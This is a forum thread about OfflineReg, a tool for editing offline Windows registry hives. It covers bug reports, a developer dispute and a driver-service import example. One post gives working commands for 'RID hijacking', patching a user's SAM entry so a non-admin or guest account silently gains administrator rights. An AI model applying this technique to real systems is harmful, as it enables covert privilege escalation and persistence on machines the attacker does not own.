340 replies to this topic

[osfixer]

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 

Edited by osfixer, 17 March 2019 - 03:21 PM.

[osfixer]

What you could do also is add support for adjusting permissions.. for keys, values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't you can add /inherit switch..

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 19 March 2019 - 03:25 PM.

[erwan.l]

Following a post here on how to blank an account's password using offlinereg, this time, lets see how to perform "RID hijacking".

The local admin account has a 01F4 rid.
What about "patching" another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy...

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.

[Wonko the Sane]

This can work with the guest account as well.

Nice

And once again all it can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").


Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

[erwan.l]

Nice

And once again all it can be used to preent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").


Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type the bios password but is perfectly valid in a home environement.

 

Disk encryption like bitlocker adresses a lot of these "local" attacks although I feel bitlocker could shortly be broken without even having to get the key from the TPM chip...

[Wonko the Sane]

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type this password but is perfectly valid in a home environement.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

[erwan.l]

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environement and it is alreay a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first names, x letters for last name, etc ) thus witnessing regularly users who forget their username because it is so cryptic.

And then a 8+ password characters which has to include digits AND non alpha num chars with a policy preventing the use of  the last 16 passwords...

 

That only is enough to keep dozens ot IT ppl busy every day

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on a good side, in big corp environements, SSO/delegation makes is so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus : if the user credentials gets compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy

[Wonko the Sane]

That only is enough to keep dozens ot IT ppl busy every day 

 

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

Usual activities of IT people I know:

1) Saying NO, it is NOT possible to whatever request

2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.

3) In all other cases do something (usually trivial) and make it seem like it is:

a. difficult

b. possibly very, very difficult

c. even better, very, very difficult AND tiring

 

Wonko

[erwan.l]

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

...

 

Sounds like you have had bad experiences with IT departments

 

Running an IT dpt, I have a difference experience.

A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLA's : 

-level 1 facing users with one task : solve the issue/address the request in less than 30 mns max with an objective of 60% of all tickets solved in L1

-level 2 specialised in different fields (networks, systems, etc) mainly focusing on more complex requests with an objective of 30% of all tickets solved in L2

-level 3 specialised in a field (network for example) AND a platform/solution (checkpoint/fortigate/etc) liaising with vendors/editors if it really needs

to

 

Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient maneeer.

 

Now I am more into IT Ops and I appreciate that adressing new needs, specially around Apps, is quite different and possibly deals more with project management.

 

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive 

[Wonko the Sane]

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions 

 

So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right .

 

Your particular IT department     is then definitely the exception that confirms the rule. 

 

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive  

Agreed

 

Wonko

[osfixer]

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg

[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"="" ; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).

Edited by osfixer, 29 March 2019 - 06:21 PM.

[erwan.l]

 

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

 

Good news for you is that you dont have to use it : life is good !

It is not as if I had not warned you several times that i have put little efforts in the import command and thay you should prefer reg load/unload for this specific matter...

[osfixer]

So you are intentionally not fixing bugs? That is really weird.

[erwan.l]

So you are intentionally not fixing bugs? That is really weird.

 

Not exactly.

I am intentionally defining my priorities.

Nothing wierd there : I believe all human beings do so.

[osfixer]

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

Edited by osfixer, 29 March 2019 - 06:58 PM.

[erwan.l]

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

 

Lets stop the discussion there.

You dont like the tool? You know of other tools? All fine with me.

 

I am not asking for any credits but at the same time will not accept negative comments not will try to decrypt your under statements.

 

You have been gently warned.

Dont spoil my fun.

[osfixer]

Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.

[darren rose]

@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude.  He creates tools for us to use for free out of kindness, he has a job to do like all of us, so can only devote limited time to these projects.  Why not just be grateful for what he does.  If it doesn't do what you want then use something else.  All of us here on this forum appreciates the work others do, and understand it is a hobby or side projects, we don't demand fixes and then get stroppy when we don't like answers. Perhaps take your attitude elsewhere

 

@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with

[misty]

@Erwan
Hello my friend. Due to another long absence on my part it has been some time with we crossed paths. It was with some sadness that I caught up with recent comments in this thread. You handle negative feedback and criticism with a maturity that does you credit.

Your continued efforts in developing and sharing your work are always appreciated by me, and no doubt many others. I hope you continue having fun here for years to come.

OfflineReg does many tasks very well, and as you have pointed out, there are alternatives out there for some functions.

I will try to catch up with the changes in your latest release - this is always an interesting process when your version numbers are taken into consideration

Misty

[erwan.l]

Hey Misty,

 

Long time no see

 

Thanks for your kind words !

No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) and as long I can remember I have encountered "challenging" behaviors...

Thus, I am still there and having fun and I am planning on making it another 25 years (at least !).

 

Think about it, Wonko has been there since dos 3.1 (if not VAX.VMS) and he is still this charming guy we know of 

If he can do it, I can do it 

 

About versionning, well hopefully, Wonko miss that post and not comment on that one (...) but there is some hope : I am currently migrating as much code of possible to lazarus/freepascal and this new IDE gives me some more capabilities there.

In short, all binaries should see the build number increase auto, the software should also display the build number auto (getting it from the binary itself) - example here with vmount (lately migrated from delphi7 to FPC).

I will also stick to a version.txt containing some extra binary details.

And I may even go as far (as some other dev guys on this forum) as including the build number in the filename.

 

It could be a good idea to define our own standards here on this forum in a dedicated post.

 

There are some great experienced guys on this forum who could share their views there.

 

Regards,

Erwan

[Wonko the Sane]

No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) a

 

Yeah, definitely kids today :

https://tinyapps.org..._in_my_day.html

 

About versionning, well hopefully, Wonko miss that post  ...

 ... after 25 years are you still grasping at straws logical impossibilities?

 

 

 

 and not comment on that one (...) but there is some hope 

 

By pure chance, Wonko happens to be in exceptionally good mood today thus your request is exceptionally granted [1].

 

 

 

Wonko

 

 

 

[1]but this of course doesn't exclude the matter from future conversations on the public park bench

[alacran]

Just to let you know my findings with this fantastic tool from erwan.l

 

It works fine from the full OS or from a WinPE, in order to run some tests with it, from my full Win 7x64 I mounted by means of DismMountService an old boot.wim from my 7pe_amd64_E , to C:\temp folder, the idea was to copy to it wofadk.sys on Windows\System32\drivers folder and install the service to run wofadk.sys when booting from the WinPE.

 

This is reg file for wofadk.sys:

Spoiler

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WofAdk]
"DebugFlags"=dword:00000000
"ErrorControl"=dword:00000001
"Start"=dword:00000000
"SupportedFeatures"=dword:00000003
"Tag"=dword:00000002
"Type"=dword:00000002
"DependOnService"=hex(7):46,00,6c,00,74,00,4d,00,67,00,72,00,00,00
"Description"="WofAdk Mini-Filter Driver"
"DisplayName"="WofAdk"
"Group"="FSFilter Compression"
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
  52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
  00,2e,00,73,00,79,00,73,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WofAdk\Instances]
"DefaultInstance"="WofAdk Instance"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WofAdk\Instances\WofAdk Instance]
"Altitude"="40730"
"Flags"=dword:00000000

 

Then just copied the mentioned file to required location, and on an elevated command promt opened on same folder where offlinereg-win64 and WofAdk.reg are located, ran this command:

 

offlinereg-win64 "C:\temp\Windows\System32\config\system" "D:\Aplicaciones\offlinereg\WofAdk.reg" import WofAdk.reg

 

EDIT-1: It is better to use: offlinereg-win64 "C:\temp\Windows\System32\config\system" " " import WofAdk.reg

 

And it did its magic and all the reg was applied to the mounted boot.wim, then just to make sure all was done fine I opened the C:\temp\Windows\System32\config\system file with Offlinereg_Gui.exe and to my surprice all was copied from the reg file but the part related to:

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
  52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
  00,2e,00,73,00,79,00,73,00,00,00

 

Was not copied fine (maybe too long) as you can see on attached pictures, all that is only to say in hexadecimal = system32\DRIVERS\wofadk.sys

 

But by means of the GUI it was very easy to delete the two last lines and edit the ImagePath value to system32\DRIVERS\wofadk.sys, then just saved and it was all, of course reopened it to verify changes were done.

Then just dismounted the boot.wim committing changes.

 

To resume:

• With this tool there is no need to mount a registry hive.
• On command line, editions/additions are made inmediately.
• On command line, long hex values are not applied correctly, but can be edited on the GUI. (1)
• On GUI it is necessary to save the changes and close the hive before closing the GUI.
• This little tool is fantastic to edit an offline registry of an attached VHD directly, or of an installed OS running the tool from another OS or a WinPE, or of a mounted WIM file.
• Also it is necessary to split our reg files depending of the section (hive) of the registry we want to edit as system, software, etc. and import only the reg file related to the hive, and then repeat the procedure for next hive.

EDIT-2: (1) The cause of this issue was found by erwan.l, and there is an easy way to avoid it see:

 

From: http://reboot.pro/to...-13#entry213675

 

I believe the issue is either with crlf and/or the ucs-2 format (your file has "magical" chars $fffe at the start of the file which you can see in a hex editor).

 

Copy paste the below to fresh new text file and try again to exclude the ucs-2 issue (i.e do not use the reg file generated by regedit).

 

And my test using this recommendation: http://reboot.pro/to...-13#entry213678

 

 

And all worked fine see attached picture, so this means we can't use reg files generated by regedit or we need to do some trick to them before using, please explain me.

 

And the next test: http://reboot.pro/to...-13#entry213679

 

 

Answering myself: (after just testing the following)

 

If we copy the content of a reg file generated by regedit.exe to a new text file and then save it as xxxxx.reg, then it can be used without any problem on Offlinereg.

 

Then only to summarize: The reg import feature is working fine, when using the fixed reg file.

 

alacran

Attached Thumbnails

• 
• 

Edited by alacran, 21 December 2019 - 11:35 PM.
Issue fixed

[alacran]

Now my old 7pe_amd64_E is capable to apply by means of WinNTSetup the WIM (Index:X) image files on Wimboot or Compact mode. Without the need to rebuild it, as proved by the attached picture. Where we can see the wofadk service is running.

 

alacran

Attached Thumbnails

• 

[Wonko the Sane]

Try using the hex string without the \ (which means "new line" in .reg files but is not accepted normally in command line).

 

I.e. this:

 

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00

may not work, but this:

 

 

"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,00,2e,00,73,00,79,00,73,00,00,00

should.

 

Wonko

[alacran]

Thanks Wonko I will try it the way you suggested and report back my findings.

 

alacran